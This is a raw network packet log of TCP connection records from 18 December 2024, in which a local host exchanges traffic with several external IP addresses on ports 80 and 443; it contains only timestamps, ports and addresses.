                                                                                                                                                                                          Dec 18, 2024 09:07:12.396439075 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.397212982 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.397398949 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.397448063 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.398216009 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.398264885 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.398298979 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.398344040 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.399271965 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.399287939 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.399338961 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.400245905 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.400449038 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.400507927 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.401320934 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.401331902 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.401371002 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.402009964 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.402065992 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.402168036 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.402221918 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.402960062 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.403011084 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.403048992 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.403095007 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.403901100 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.404278994 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.404335022 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.405014038 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.405025005 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.405065060 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.405093908 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.405911922 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406172991 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406233072 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406795979 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406863928 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406891108 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.406940937 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.407759905 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.407838106 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.407888889 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.408695936 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.408749104 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.408772945 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.408821106 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.409781933 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.409826040 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.409832001 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.409874916 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.410578012 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.410628080 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.410782099 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.410830021 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.411576986 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.411640882 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.411689043 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.412580967 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.412630081 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.412750959 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.412801027 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.413439035 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.413492918 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.413784027 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.413832903 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.414413929 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.414459944 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.414561033 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.414604902 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.415359974 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.415415049 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.415447950 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.416290998 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.416337013 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.416451931 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.416496992 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.417304993 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.417372942 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.417382956 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.417423010 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.418198109 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.418246031 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.559813976 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.559906960 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.559986115 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560225010 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560261965 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560281992 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560314894 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560707092 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560762882 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560825109 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.560879946 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.561747074 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.561803102 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.561856031 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.561906099 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.562700033 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.562748909 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.562817097 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.562865019 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.563621044 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.563757896 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.563817978 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.564526081 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.564585924 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.564644098 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.564699888 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.565504074 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.565558910 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.565612078 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.565668106 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.566445112 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.566498041 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.566500902 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.566551924 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.567445040 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.567650080 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.567723036 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.568386078 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.568443060 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.568522930 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.568578005 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.569350004 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.569422007 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.569539070 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.569591999 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.570269108 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.570326090 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.570357084 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.570410013 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.571228027 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.571278095 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.571288109 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.571340084 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.572264910 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.572315931 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.572386026 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.573142052 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.573196888 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.573246002 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.573307037 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576673985 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576721907 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576756001 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576787949 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576790094 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576809883 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576822996 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576845884 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576858044 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576872110 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.576900959 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.577528954 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.577584028 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.577663898 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.577716112 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.578675985 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.578739882 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.578811884 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.578862906 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.579572916 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.579607964 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.579664946 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.580352068 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.580388069 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.580413103 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.580442905 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.581254005 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.581305981 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.581389904 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.581439972 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582140923 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582187891 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582349062 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582412004 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582691908 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582741976 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582803011 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.582863092 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.583755970 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.583910942 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.583976984 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.586734056 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.586796999 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.586882114 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.586930037 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587402105 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587435961 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587450027 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587470055 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587503910 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587512970 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.587547064 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588104963 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588145018 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588155985 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588190079 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588807106 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588860989 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.588985920 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.589035988 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:12.589910984 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:12.589962006 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:14.781272888 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:14.781665087 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:14.901475906 CET8049710185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:14.901568890 CET8049712185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:14.901633978 CET4971080192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:14.901710033 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:14.902106047 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:15.022389889 CET8049712185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.095633984 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:16.095694065 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.095808029 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:16.099016905 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:16.099034071 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.245498896 CET8049712185.215.113.43192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.245822906 CET4971280192.168.2.8185.215.113.43
                                                                                                                                                                                          Dec 18, 2024 09:07:16.247145891 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:16.247457981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367027044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367063999 CET804971131.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367111921 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367153883 CET4971180192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:16.367350101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:16.486910105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.329078913 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.329176903 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:17.330795050 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:17.330826998 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.331243038 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.374182940 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:17.379827976 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:17.379827976 CET49713443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:17.380009890 CET44349713104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690732956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690828085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690864086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690884113 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690938950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.690938950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691036940 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691082001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691093922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691131115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691139936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691168070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691169977 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691205978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691524982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691556931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691580057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691591024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691591978 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.691632986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.810664892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.810735941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.810806990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.810863972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.814686060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.814754963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.881771088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.881880999 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.881895065 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.881997108 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.885853052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.885978937 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.886039019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.886091948 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.894251108 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.894309998 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.894335032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.894386053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.902944088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.903038979 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.903141022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.903189898 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.911370039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.911415100 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.911539078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.919039011 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.919121981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.919183969 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.919241905 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.927510023 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.927628040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.927645922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.927695990 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.935750008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.935805082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:17.935914040 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:17.935957909 CET4971480192.168.2.831.41.244.11
